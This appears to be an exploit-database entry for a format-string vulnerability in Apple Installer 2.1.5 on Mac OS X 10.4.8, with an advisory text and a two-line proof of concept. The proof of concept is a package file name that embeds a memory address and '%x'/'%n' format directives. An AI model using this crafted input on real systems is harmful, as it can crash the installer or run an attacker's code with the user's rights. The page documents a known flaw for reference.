header-logo
Suggest Exploit
vendor:
Apple Installer
by:
Unknown
7.5
CVSS
HIGH
Format String Vulnerability
Unknown
CWE
Product Name: Apple Installer
Affected Version From: Apple Installer Version 2.1.5
Affected Version To: Unknown
Patch Exists: NO
Related CWE: Unknown
CPE: a:apple:installer:2.1.5
Metasploit:
Other Scripts:
Platforms Tested: Mac OS X 10.4.8
Unknown

Apple Installer Format String Vulnerability

Apple Installer is prone to a format-string vulnerability because the application fails to properly sanitize user-supplied input before passing it as the format specifier to a formatted-printing function. A successful attack may crash the application or possibly allow the attacker to execute arbitrary code. This may facilitate unauthorized access or privilege escalation in the context of the user running the application.

Mitigation:

Unknown
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/22272/info

Apple Installer is prone to a format-string vulnerability because the application fails to properly sanitize user-supplied input before passing it as the format specifier to a formatted-printing function.

A successful attack may crash the application or possibly allow the attacker to execute arbitrary code. This may facilitate unauthorized access or privilege escalation in the context of the user running the application.

Apple Installer Version 2.1.5 on Mac OS X 10.4.8 is vulnerable to this issue; other versions may also be affected. 

$ touch AAAA`ruby -e 'require "cgi"; print CGI::escape("\x9c\xe7\xff\xbf") + CGI::escape("%.20d") + CGI::escape("%x" * 20)'`%n.pkg
$ open AAAA%9C%E7%FF%BF%25.20d%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%25x%n.pkg